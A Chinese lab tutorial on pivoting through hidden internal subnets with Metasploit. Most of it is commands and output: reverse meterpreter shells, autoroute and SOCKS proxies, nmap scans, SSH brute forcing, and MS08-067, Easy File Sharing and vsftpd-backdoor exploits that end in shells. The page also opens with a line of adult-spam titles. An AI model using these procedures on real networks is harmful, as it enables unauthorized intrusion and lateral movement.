精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

多重轉發滲透隱藏內網

作者:quanyechavshuo
安全 網站安全
今天本文講解關于多重轉發滲透隱藏內網的實例。

[[185320]]

一、About

內網機器如下:

內網機器

說明:

1)Attacker為攻擊者,有一個網卡,網段為172.16.0.0,Attacker系統為kali系統

2)RD為第一個已經滲透的目標,有兩塊網卡,對應172.16.0.0和7.7.7.0兩個網段

3)JC有兩塊網卡,對應7.7.7.0和8.8.8.0兩個網段,JC有ms08-067和efs bof兩個漏洞,可getshell

4)SK有一塊網卡,對應8.8.8.0網段,SK有vsftpd的漏洞,可getshell

5)起初Attacker只拿到RD的msf的shell,對于目標內網情況一無所知,也不知道存在7.7.7.0和8.8.8.0這兩個隱藏的網段

6)目標是準備通過RD來滲透內網中7.7.7.0和8.8.8.0兩個隱藏的網段

二、Step1

Attacker在RD上通過webshell運行了一個reverse類型的后門,然后操作如下:

  1. msf > use exploit/multi/handler  
  2. msf exploit(handler) > set payload windows/meterpreter/reverse_tcp 
  3. payload => windows/meterpreter/reverse_tcp 
  4. msf exploit(handler) > set LHOST 172.16.0.20  
  5. LHOST => 172.16.0.20msf exploit(handler) > set LPORT 1234 
  6. LPORT => 1234msf exploit(handler) > run 
  7. [*] Started reverse TCP handler on 172.16.0.20:1234  
  8. [*] Starting the payload handler... 
  9. [*] Sending stage (957487 bytes) to 172.16.0.11 
  10. [*] Meterpreter session 2 opened (172.16.0.20:1234 -> 172.16.0.11:49162)meterpreter > ifconfig 
  11. Interface  1============ 
  12. Name         : Software Loopback Interface 1Hardware MAC : 00:00:00:00:00:00MTU          : 4294967295IPv4 Address : 127.0.0.1IPv4 Netmask : 255.0.0.0IPv6 Address : ::1IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff 
  13. Interface 11============ 
  14. Name         : Intel(R) PRO/1000 MT Desktop Adapter 
  15. Hardware MAC : 08:00:27:e1:3f:af 
  16. MTU          : 1500IPv4 Address : 172.16.0.11IPv4 Netmask : 255.255.255.0Interface 19============ 
  17. Name         : Intel(R) PRO/1000 MT Desktop Adapter #2Hardware MAC : 08:00:27:7f:3c:fe 
  18. MTU          : 1500IPv4 Address : 7.7.7.11IPv4 Netmask : 255.255.255.0 

三、Step2

發現RD有兩塊網卡后,想辦法滲透另一個網段7.7.7.0,首先要添加路由[不添加路由也可以直接用meterpreter shell中的模塊訪問 到7.7.7.x網段,添加路由的目的是為了使得msf模塊可以訪問到7.7.7.x網段],meterpreter shell可以訪問到7.7.7.x網段,msf 中的模塊不能訪問到7.7.7.x網段,msf中的模塊所處的ip是攻擊者的ip,meterpreter shell所處的ip是RD的ip.在meterpreter中 添加路由的目的是為了給msf模塊作代理,也即給Attacker作代理,但是只能給Attacker的msf模塊作代理,要想給Attacker的其他 應用程序作代理,則需要在meterpreter添加路由后再運行msf的開啟sock4的模塊,然后再用proxychains來設置Attacker的其他 應用程序的代理為msf的開啟sock4代理模塊中設置的代理入口。

操作如下:

  1. meterpreter > run autoroute -s 7.7.7.0/24[*] Adding a route to 7.7.7.0/255.255.255.0... 
  2. [+] Added route to 7.7.7.0/255.255.255.0 via 172.16.0.11[*] Use the -p option to list all active routes 
  3. meterpreter > run autoroute -p 
  4. Active Routing Table 
  5. ==================== 
  6.  Subnet Netmask Gateway 
  7.  ------ ------- ------- 7.7.7.0 255.255.255.0 Session 2meterpreter > 

然后開始掃描7.7.7.0網段,操作如下:

  1. meterpreter > run post/windows/gather/arp_scanner RHOSTS=7.7.7.0/24[*] Running module against DISCORDIA 
  2. [*] ARP Scanning 7.7.7.0/24[*]     IP: 7.7.7.11 MAC 08:00:27:7f:3c:fe (CADMUS COMPUTER SYSTEMS) 
  3. [*]     IP  7.7.7.12 MAC 08:00:27:3a:b2:c1 (CADMUS CIMPUTER SYSTEMS) 
  4. [*]     IP: 7.7.7.20 MAC 08:00:27:fa:a0:c5 (CADMUS COMPUTER SYSTEMS) 
  5. [*]     IP: 7.7.7.255 MAC 08:00:27:3f:2a:b5 (CADMUS COMPUTER SYSTEMS) 
  6. meterpreter > 

arp_scanner不太夠用,不能掃到端口信息[此時也可用msf自帶的其他可以掃描端口的模塊如auxiliary/scanner/portscan/tcp來掃 描,因為前面添加了路由,使得msf中的模塊可以用meterpreter作為代理訪問到7.7.7.x網段],于是用Attacker本機的nmap來掃[可以 更完全的掃描,nmap應該比msf中的掃描模塊強大],首先在RD上開sockets4代理,然后用proxychains設置nmap的代理為msf模塊開 啟的Attacker的1080端口提供的代理,操作如下:

  1. meterpreter > background  
  2. [*] Backgrounding session 2... 
  3. msf > use auxiliary/server/socks4a  
  4. msf auxiliary(socks4a) > show options  
  5. Module options (auxiliary/server/socks4a): 
  6.    Name     Current Setting  Required  Description 
  7.    ----     ---------------  --------  ----------- 
  8.    SRVHOST  0.0.0.0          yes       The address to listen on 
  9.    SRVPORT  1080             yes       The port to listen on. 
  10. Auxiliary action: 
  11.    Name   Description 
  12.    ----   ----------- 
  13.    Proxy   
  14. msf auxiliary(socks4a) > set srvhost 172.16.0.20 
  15. srvhost => 172.16.0.20msf auxiliary(socks4a) > run 
  16. [*] Auxiliary module execution completed 
  17. [*] Starting the socks4a proxy server 
  18. msf auxiliary(socks4a) > netstat -antp | grep 1080 
  19. [*] exec: netstat -antp | grep 1080 
  20. tcp        0      172.16.0.20:1080            0.0.0.0:*               LISTEN      3626/ruby        
  21. msf auxiliary(socks4a) > 

proxychains設置/etc/proxychains.conf如下:

  1. [ProxyList]# add proxy here ...# meanwile# defaults set to "tor"#socks4  127.0.0.1 9050socks4  172.16.0.20 1080 

nmap掃描如下:

  1. root@kali:~# proxychains nmap -sT -sV -Pn -n -p22,80,135,139,445 --script=smb-vuln-ms08-067.nse 7.7.7.20ProxyChains-3.1 (http://proxychains.sf.net)Starting Nmap 7.25BETA1 ( https://nmap.org )|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:445-<><>-OK 
  2. |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:80-<><>-OK 
  3. |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:135-<><>-OK 
  4. |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK 
  5. |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:139-<><>-OK 
  6. |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK 
  7. |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:135-<><>-OK 
  8. |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:139-<><>-OK 
  9. |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:445-<><>-OK 
  10. |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:139-<><>-OK 
  11. |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:135-<><>-OK 
  12. |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:445-<><>-OK 
  13. Nmap scan report for 7.7.7.20Host is up (0.17s latency). 
  14. PORT     STATE    SERVICE      VERSION 
  15. 22/tcp   open     ssh          Bitvise WinSSHD 7.16 (FlowSsh 7.15; protocol 2.0)80/tcp   closed   http         Easy File Sharing Web Server httpd 6.9 
  16. 135/tcp  open     msrpc        Microsoft Windows RPC 
  17. 139/tcp  open     netbios-ssn  Microsoft Windows netbios-ssn 
  18. 445/tcp  open     microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds 
  19. Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003 
  20. Host script results: 
  21. | smb-vuln-ms08-067:  
  22. |   VULNERABLE: 
  23. |   Microsoft Windows system vulnerable to remote code execution (MS08-067)|     State: VULNERABLE 
  24. |     IDs: CVE:CVE-2008-4250 
  25. |          The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,  
  26. |          Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary  
  27. |          code via a crafted RPC request that triggers the overflow during path canonicalization. 
  28. |  
  29. |     Disclosure date: 2008-10-23 
  30. |     References: 
  31. |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspxService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 12.51 seconds 
  32. root@kali:~# 

現在發現了7.7.7.20(JC)這臺機器端口開放比較多,嘗試找出JC的漏洞,操作如下: 首先看看JC的80端口運行了什么cms,但是Attacker的瀏覽器直接訪問http://172.16.0.20會無法訪問,因為Attacker的網段與JC 不在同一網段,此處有個要注意的內容:

Attention:可以選擇使用proxychains設置Attacker的瀏覽器的代理為Attacker的1080端口的socks4代理入口,也可通過在RD的meterpreter會 話中運行portfwd模塊命令,portfwd命令如下:

  1. meterpreter > portfwd add -L 172.16.0.20 -l 2323 -p 80 -r 7.7.7.20[*] Local TCP relay created: 172.16.0.20:2323 <-> 7.7.7.20:80meterpreter > 
  2. meterpreter > portfwd listActive Port Forwards 
  3. ==================== 
  4.    Index  Local             Remote       Direction 
  5.    -----  -----             ------       ---------   1      172.16.0.20:2323  7.7.7.20:80  Forward1 total active port forwards. 
  6. meterpreter > 

通過訪問Attacker的2323端口訪問JC的80端口,結果如下:

通過訪問Attacker的2323端口訪問JC的80端口

這里的portfwd模塊不只是名字上的端口轉發的意思,目前筆者認為portfwd相當于半個ssh正向代理加一個ssh反向代理組成的綜合命令,ssh正向反向代理可參考這里的理解 。ssh正向反向代理理解筆者認為portfwd命令之后Attacker可以通過訪問Attacker本身ip的2323端口進而訪問到JC的80端口期間發生了3件事。

1.RD訪問JC的80端口,這里相當于半個ssh正向代理

2.RD綁定已經訪問到的JC的80端口的數據到Attacker的2323端口,這里相當于一個ssh反向代理,相當于RD有Attacker的ssh權限

3.攻擊者的瀏覽器訪問攻擊者自己的172.16.0.20:2323

portfwd的用法如下:

  1. meterpreter > portfwd -h 
  2. Usage: portfwd [-h] [add | delete | list | flush] [args] 
  3. OPTIONS: 
  4.      -L >opt>  The local host to listen on (optional). 
  5.      -h        Help banner. 
  6.      -l >opt>  The local port to listen on. 
  7.      -p >opt>  The remote port to connect on. 
  8.      -r >opt>  The remote host to connect on. 
  9. meterpreter > 

其中-L只能設置為攻擊者的ip,不能設置為肉雞的ip,-L設置的ip可以是攻擊者的內網ip,-r也可以是目標的內網ip,兩個內網之 間通過meterpreter會話的"隧道"來連通,如果-L后設置的ip是攻擊者的內網ip,-r后設置的是目標機器的內網ip,portfwd通過 meterpreter會話連通兩臺,-l是指攻擊者的監聽端口,運行完上面的portfwd add -L 172.16.0.20 -l 2323 -p 80 -r 7.7.7.20 命令后,Attacker的2323端口將變成監聽狀態(也即Attacker會開啟2323端口) 這里還要注意route add命令只能是在meterpreter會話中有效,不能系統全局有效,筆者認為route add也是通過meterpreter會 話的"隧道"來實現攻擊者能夠訪問目標機器其他網段機器的,也即在上面的Attacker通過portfwd來實現訪問目標機器其他網段 機器而不能因為在portfwd模塊運行前由于已經運行了route add模塊而由Attacker的瀏覽器直接訪問目標7.7.7.20:80,因為 route add只會給msf的模塊提供meterpreter會話通道作為代理服務,只有meterpreter會話下可用的模塊可以直接訪問7.7.7.x 網段,Attacker的瀏覽器想直接訪問7.7.7.20需要使用proxychins和msf開啟的sock4代理.

上面訪問得到目標機器JC的80端口信息看出JC運行的是Eash File Sharing Web Server,可用msf中的模塊嘗試getshell,操作如 下(如果沒有在meterpreter中添加路由msf是訪問不到7.7.7.20的):

  1. msf  > use exploit/windows/http/easyfilesharing_seh  
  2. msf exploit(easyfilesharing_seh) > show options  
  3. Module options (exploit/windows/http/easyfilesharing_seh): 
  4.    Name   Current Setting  Required  Description 
  5.    ----   ---------------  --------  ----------- 
  6.    RHOST                   yes       The target address 
  7.    RPORT  80               yes       The target port 
  8. Exploit target: 
  9.    Id  Name 
  10.    --  ---- 
  11.    0   Easy File Sharing 7.2 HTTP 
  12. msf exploit(easyfilesharing_seh) > set rhost 7.7.7.20 
  13. rhost => 7.7.7.20msf exploit(easyfilesharing_seh) > set payload windows/meterpreter/bind_tcp 
  14. payload => windows/meterpreter/bind_tcp 
  15. msf exploit(easyfilesharing_seh) > run 
  16. [*] Started bind handler 
  17. [*] 7.7.7.20:80 - 7.7.7.20:80 - Sending exploit... 
  18. [+] 7.7.7.20:80 - Exploit Sent 
  19. [*] Sending stage (957999 bytes) to 7.7.7.20 
  20. [*] Meterpreter session 2 opened (172.16.0.20-172.16.0.11:0 -> 7.7.7.20:4444) at 2016-12-26 14:21:11 +0300 

或者從JC(7.7.7.20)22端口入手:

  1. msf > use auxiliary/scanner/ssh/ssh_enumusers  
  2. msf auxiliary(ssh_enumusers) > set rhosts 7.7.7.20rhosts => 7.7.7.20msf auxiliary(ssh_enumusers) > set rport 22rport => 22msf auxiliary(ssh_enumusers) > set user_file /usr/share/wordlists/metasploit/default_users_for_services_unhash.txt 
  3. user_file => /usr/share/wordlists/metasploit/default_users_for_services_unhash.txt 
  4. msf auxiliary(ssh_enumusers) > run 
  5. [*] 7.7.7.20:22 - SSH - Checking for false positives 
  6. [*] 7.7.7.20:22 - SSH - Starting scan 
  7. [+] 7.7.7.20:22 - SSH - User 'admin' found 
  8. [-] 7.7.7.20:22 - SSH - User 'root' not found 
  9. [-] 7.7.7.20:22 - SSH - User 'Administrator' not found 
  10. [+] 7.7.7.20:22 - SSH - User 'sysadm' found 
  11. [-] 7.7.7.20:22 - SSH - User 'tech' not found 
  12. [-] 7.7.7.20:22 - SSH - User 'operator' not found 
  13. [+] 7.7.7.20:22 - SSH - User 'guest' found 
  14. [-] 7.7.7.20:22 - SSH - User 'security' not found 
  15. [-] 7.7.7.20:22 - SSH - User 'debug' not found 
  16. [+] 7.7.7.20:22 - SSH - User 'manager' found 
  17. [-] 7.7.7.20:22 - SSH - User 'service' not found 
  18. [-] 7.7.7.20:22 - SSH - User '!root' not found 
  19. [+] 7.7.7.20:22 - SSH - User 'user' found 
  20. [-] 7.7.7.20:22 - SSH - User 'netman' not found 
  21. [+] 7.7.7.20:22 - SSH - User 'super' found 
  22. [-] 7.7.7.20:22 - SSH - User 'diag' not found 
  23. [+] 7.7.7.20:22 - SSH - User 'Cisco' found 
  24. [-] 7.7.7.20:22 - SSH - User 'Manager' not found 
  25. [+] 7.7.7.20:22 - SSH - User 'DTA' found 
  26. [-] 7.7.7.20:22 - SSH - User 'apc' not found 
  27. [+] 7.7.7.20:22 - SSH - User 'User' found 
  28. [-] 7.7.7.20:22 - SSH - User 'Admin' not found 
  29. [+] 7.7.7.20:22 - SSH - User 'cablecom' found 
  30. [-] 7.7.7.20:22 - SSH - User 'adm' not found 
  31. [+] 7.7.7.20:22 - SSH - User 'wradmin' found 
  32. [-] 7.7.7.20:22 - SSH - User 'netscreen' not found 
  33. [+] 7.7.7.20:22 - SSH - User 'sa' found 
  34. [-] 7.7.7.20:22 - SSH - User 'setup' not found 
  35. [+] 7.7.7.20:22 - SSH - User 'cmaker' found 
  36. [-] 7.7.7.20:22 - SSH - User 'enable' not found 
  37. [+] 7.7.7.20:22 - SSH - User 'MICRO' found 
  38. [-] 7.7.7.20:22 - SSH - User 'login' not found 
  39. [*] Caught interrupt from the console... 
  40. [*] Auxiliary module execution completed 
  41. ^C 
  42. msf auxiliary(ssh_enumusers) > 

然后用hydra本地用msf模塊開啟的1080端口的sock4代理嘗試爆破:

  1. root@kali:~# proxychains hydra 7.7.7.20 ssh -s 22 -L /tmp/user.txt -P top100.txt -t 4 
  2. ProxyChains-3.1 (http://proxychains.sf.net) 
  3. Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. 
  4. Hydra (http://www.thc.org/thc-hydra) starting  
  5. [WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort... 
  6. [DATA] max 4 tasks per 1 server, overall 64 tasks, 20 login tries (l:2/p:10), ~0 tries per task 
  7. [DATA] attacking service ssh on port 22 
  8. |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK 
  9. |S-chain|-<>-172.16.0.20:1080-|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-7.7.7.20:22-|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK<><>-OK<><>-OK<><>-OK 
  10. |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK 
  11. [22][ssh] host: 7.7.7.20   login: admin   password: 123456 
  12. |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK<><>-OK 
  13. |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK 
  14. |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK 
  15. 1 of 1 target successfully completed, 1 valid password found 
  16. Hydra (http://www.thc.org/thc-hydra) finished 
  17. root@kali:~# 

發現有可用帳戶密碼admin:123456,然后再用sock4代理ssh登錄:

  1. root@kali:~# proxychains ssh admin@7.7.7.20 
  2. ProxyChains-3.1 (http://proxychains.sf.net) 
  3. |D-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK 
  4. The authenticity of host '7.7.7.20 (7.7.7.20)' can't be established. 
  5. ECDSA key fingerprint is SHA256:Rcz2KrPF3BTo16Ng1kET91ycbr9c8vOkZcZ6b4VawMQ. 
  6. Are you sure you want to continue connecting (yes/no)? yes 
  7. Warning: Permanently added '7.7.7.20' (ECDSA) to the list of known hosts. 
  8. admin@7.7.7.20's password:  
  9. bvshell:/C/Documents and Settings/All Users$ pwd 
  10. /C/Documents and Settings/All Users 
  11. bvshell:/C/Documents and Settings/All Users$ dir 
  12. 2016-12-24  21:32          <DIR> Application Data 
  13. 2016-12-25  06:16          <DIR> Desktop 
  14. 2016-12-24  18:36          <DIR> Documents 
  15. 2016-12-24  18:37          <DIR> DRM 
  16. 2016-12-24  21:32          <DIR> Favorites 
  17. 2016-12-24  18:38          <DIR> Start Menu 
  18. 2016-12-24  21:32          <DIR> Templates 
  19.       0 Files                  0 bytes 
  20.       7 Directories 
  21. bvshell:/C/Documents and Settings/All Users$ 

或者用ms08067:

  1. msf > use exploit/windows/smb/ms08_067_netapi  
  2. msf exploit(ms08_067_netapi) > show options  
  3. Module options (exploit/windows/smb/ms08_067_netapi): 
  4.    Name     Current Setting  Required  Description 
  5.    ----     ---------------  --------  ----------- 
  6.    RHOST                     yes       The target address 
  7.    RPORT    445              yes       The SMB service port 
  8.    SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC) 
  9. Exploit target: 
  10.    Id  Name 
  11.    --  ----   0   Automatic Targeting 
  12. msf exploit(ms08_067_netapi) > set rhost 7.7.7.20rhost => 7.7.7.20msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp 
  13. payload => windows/meterpreter/bind_tcp 
  14. msf exploit(ms08_067_netapi) > show options  
  15. Module options (exploit/windows/smb/ms08_067_netapi): 
  16.    Name     Current Setting  Required  Description 
  17.    ----     ---------------  --------  ----------- 
  18.    RHOST    7.7.7.20         yes       The target address 
  19.    RPORT    445              yes       The SMB service port 
  20.    SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC) 
  21. Payload options (windows/meterpreter/bind_tcp): 
  22.    Name      Current Setting  Required  Description 
  23.    ----      ---------------  --------  ----------- 
  24.    EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none) 
  25.    LPORT     4444             yes       The listen port 
  26.    RHOST     7.7.7.20         no        The target address 
  27. Exploit target: 
  28.    Id  Name 
  29.    --  ----   0   Automatic Targeting 
  30. msf exploit(ms08_067_netapi) > run 
  31. [*] Started bind handler 
  32. [*] 7.7.7.20:445 - Automatically detecting the target... 
  33. [*] 7.7.7.20:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown 
  34. [*] 7.7.7.20:445 - We could not detect the language pack, defaulting to English 
  35. [*] 7.7.7.20:445 - Selected Target: Windows 2003 SP2 English (NX) 
  36. [*] 7.7.7.20:445 - Attempting to trigger the vulnerability... 
  37. [*] Sending stage (957999 bytes) to 7.7.7.20[*] Meterpreter session 2 opened (172.16.0.20-172.16.0.11:0 -> 7.7.7.20:4444)  
  38. meterpreter > 

成功溢出getshell后查看JC(7.7.7.20)網卡信息:

  1. meterpreter > ipconfigInterface  1============Name         : MS TCP Loopback interfaceHardware MAC : 00:00:00:00:00:00MTU          : 1520IPv4 Address : 127.0.0.1Interface 65539============Name         : Intel(R) PRO/1000 MT Desktop AdapterHardware MAC : 08:00:27:29:cd:cbMTU          : 1500IPv4 Address : 8.8.8.3IPv4 Netmask : 255.255.255.0Interface 65540============Name         : Intel(R) PRO/1000 MT Desktop Adapter #2Hardware MAC : 08:00:27:e3:47:43MTU          : 1500IPv4 Address : 7.7.7.20IPv4 Netmask : 255.255.255.0meterpreter > 

發現又出現一個8.8.8.x的網段,于是將這個網段添加路由,以便msf中的模塊可以訪問到8.8.8.x網段.

四、Step3

先直接用新的meterpreter shell看看8.8.8.x這個網段有什么機器

  1. meterpreter > run post/windows/gather/arp_scanner RHOSTS=8.8.8.0/24[*] Running module against SRV03[*] ARP Scanning 8.8.8.0/24[*]   IP: 8.8.8.3 MAC 08:00:27:29:cd:cb (CADMUS COMPUTER SYSTEMS)[*]   IP: 8.8.8.1 MAC 0a:00:27:00:00:03 (UNKNOWN)[*]   IP: 8.8.8.9 MAC 08:00:27:56:f1:7c (CADMUS COMPUTER SYSTEMS)[*]    IP: 8.8.8.13 MAC 08:00:27:13:a3:b1 (CADMUS COMPUTER SYSTEMS) 

為了讓msf中所有模塊都能訪問到8.8.8.x網段,在新的meterpreter會話中添加路由:

  1. meterpreter > run autoroute -s 8.8.8.0/24[*] Adding a route to 8.8.8.0/255.255.255.0...[+] Added route to 8.8.8.0/255.255.255.0 via 7.7.7.20[*] Use the -p option to list all active routes 

為了讓Attacker的除了msf模塊以外的其他應用程序能訪問到8.8.8.x網段,再使用msf的開啟sock4代理的模塊開啟另外一個端口 作為8.8.8.x網段的入口:

  1. msf exploit(ms08_067_netapi) > use auxiliary/server/socks4a  
  2. msf auxiliary(socks4a) > show options  
  3. Module options (auxiliary/server/socks4a): 
  4.    Name     Current Setting  Required  Description 
  5.    ----     ---------------  --------  ----------- 
  6.    SRVHOST  172.16.0.20      yes       The address to listen on 
  7.    SRVPORT  1080             yes       The port to listen on. 
  8. Auxiliary action: 
  9.    Name   Description 
  10.    ----   ----------- 
  11.    Proxy   
  12. msf auxiliary(socks4a) > set SRVPORT 1081SRVPORT => 1081msf auxiliary(socks4a) > run 
  13. [*] Auxiliary module execution completed 
  14. [*] Starting the socks4a proxy server 
  15. msf auxiliary(socks4a) > 

也即現在Attacker本地的1080端口的代理可以訪問到7.7.7.x網段,1081端口的代理可以訪問到8.8.8.x網段,然后將新開的端口 添加到proxychains的配置文件中:

  1. root@kali:~# cat /etc/proxychains.conf | grep -v "#"dynamic_chainproxy_dns tcp_read_time_out 15000tcp_connect_time_out 8000socks4  172.16.0.20 1080  # First Pivotsocks4  172.16.0.20 1081  # Second Pivot 

上面的兩個代理相當于扇門的鑰匙,172.16.0.20:1080是7.7.7.x的鑰匙,172.16.0.20:1081是7.7.7.x后面的8.8.8.x的鑰匙 ,Attacker要想訪問到8.8.8.x可以通過先打開7.7.7.x的門,再打開8.8.8.x的門(因為8.8.8.x這個門在7.7.7.x這個門之后)

使用Attacker本地的nmap掃描下8.8.8.x網段:

  1. root@kali:~# proxychains nmap -sT -sV -p21,22,23,80 8.8.8.9 -n -Pn -vvProxyChains-3.1 (http://proxychains.sf.net)Starting Nmap 7.25BETA1 ( https://nmap.org )Nmap wishes you a merry Christmas! Specify -sX for Xmas Scan (https://nmap.org/book/man-port-scanning-techniques.html).NSE: Loaded 36 scripts for scanning. 
  2. Initiating Connect Scan 
  3. Scanning 8.8.8.9 [4 ports] 
  4. |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:21-<><>-OK 
  5. Discovered open port 21/tcp on 8.8.8.9|D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:23-<><>-OK 
  6. Discovered open port 23/tcp on 8.8.8.9|D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:22-<><>-OK 
  7. Discovered open port 22/tcp on 8.8.8.9|D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:80-<><>-OK 
  8. Discovered open port 80/tcp on 8.8.8.9Completed Connect Scan at 05:54, 1.37s elapsed (4 total ports)Initiating Service scan at 05:54 
  9. Scanning 4 services on 8.8.8.9 
  10. |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:21-<><>-OK 
  11. |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:22-<><>-OK 
  12. |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:23-<><>-OK 
  13. |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:80-<><>-OK 
  14. Completed Service scan at 05:54, 11.09s elapsed (4 services on 1 host)NSE: Script scanning 8.8.8.9. 
  15. NSE: Starting runlevel 1 (of 2) scan. 
  16. Initiating NSE at 05:54 
  17. |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:80-<><>-OK 
  18. |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:80-<><>-OK 
  19. Completed NSE at 05:54, 1.71s elapsed 
  20. NSE: Starting runlevel 2 (of 2) scan. 
  21. Initiating NSE at 05:54 
  22. Completed NSE at 05:54, 0.00s elapsed 
  23. Nmap scan report for 8.8.8.9 
  24. Host is up, received user-set (0.41s latency). 
  25. Scanned  
  26. PORT   STATE SERVICE REASON  VERSION 
  27. 21/tcp open  ftp     syn-ack vsftpd 2.3.4 
  28. 22/tcp open  ssh     syn-ack OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)23/tcp open  telnet  syn-ack Linux telnetd 
  29. 80/tcp open  http    syn-ack Apache httpd 2.2.8 ((Ubuntu) DAV/2) 
  30. Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel 
  31. Read data files from: /usr/bin/../share/nmap 
  32. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 14.59 seconds 
  33. root@kali:~# 

發現8.8.8.9(SK)這臺機器可能有漏洞,用msf模塊嘗試getshell:

  1. msf > msf > use exploit/unix/ftp/vsftpd_234_backdoor msf exploit(vsftpd_234_backdoor) > show options Module options (exploit/unix/ftp/vsftpd_234_backdoor):   Name   Current Setting  Required  Description   ----   ---------------  --------  -----------   RHOST                   yes       The target address   RPORT  21               yes       The target portExploit target:   Id  Name   --  ----   0   Automaticmsf exploit(vsftpd_234_backdoor) > set rhost 8.8.8.9rhost => 8.8.8.9msf exploit(vsftpd_234_backdoor) > run[*] 8.8.8.9:21 - Banner: 220 (vsFTPd 2.3.4)[*] 8.8.8.9:21 - USER: 331 Please specify the password.[+] 8.8.8.9:21 - Backdoor service has been spawned, handling...[+] 8.8.8.9:21 - UID: uid=0(root) gid=0(root)[*] Found shell.[*] Command shell session 4 opened (Local Pipe -> Remote Pipe) pwd/iduid=0(root) gid=0(root)ifconfigeth0      Link encap:Ethernet  HWaddr 08:00:27:56:f1:7c            inet addr:8.8.8.9  Bcast:8.8.8.255  Mask:255.255.255.0          inet6 addr: fe80::a00:27ff:fe56:f17c/64 Scope:Link          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1          RX packets:10843 errors:0 dropped:0 overruns:0 frame:0          TX packets:2779 errors:0 dropped:0 overruns:0 carrier:0          collisions:0 txqueuelen:1000           RX bytes:1081842 (1.0 MB)  TX bytes:661455 (645.9 KB)          Base address:0xd010 Memory:f0000000-f0020000 lo        Link encap:Local Loopback            inet addr:127.0.0.1  Mask:255.0.0.0          inet6 addr: ::1/128 Scope:Host          UP LOOPBACK RUNNING  MTU:16436  Metric:1          RX packets:18161 errors:0 dropped:0 overruns:0 frame:0          TX packets:18161 errors:0 dropped:0 overruns:0 carrier:0          collisions:0 txqueuelen:0           RX bytes:5307479 (5.0 MB)  TX bytes:5307479 (5.0 MB) 
責任編輯:趙寧寧 來源: 安全客
多重轉發內網滲透
相關推薦

2013-04-12 13:21:44

2013-04-18 17:07:36

2012-11-28 14:09:41

2020-12-30 10:38:41

Web安全內網工具

2013-05-06 15:42:49

2015-05-18 11:00:50

2021-10-11 10:39:13

內網信息收集

2012-11-29 16:11:06

2022-09-16 10:00:31

端口服務器

2013-04-22 10:07:08

2016-09-26 14:40:25

Windows內網實用命令

2012-11-08 14:28:16

2011-05-11 11:13:21

內網嗅探破解

2014-08-05 17:09:55

2016-05-31 10:11:51

2020-08-16 20:36:21

滲透測試漏洞網絡攻擊

2015-02-27 16:10:25

2009-10-12 09:23:20

2020-09-26 22:08:17

內網協議滲透

2021-11-02 10:40:51

內網穿透代理工具Linux
點贊
收藏

51CTO技術棧公眾號

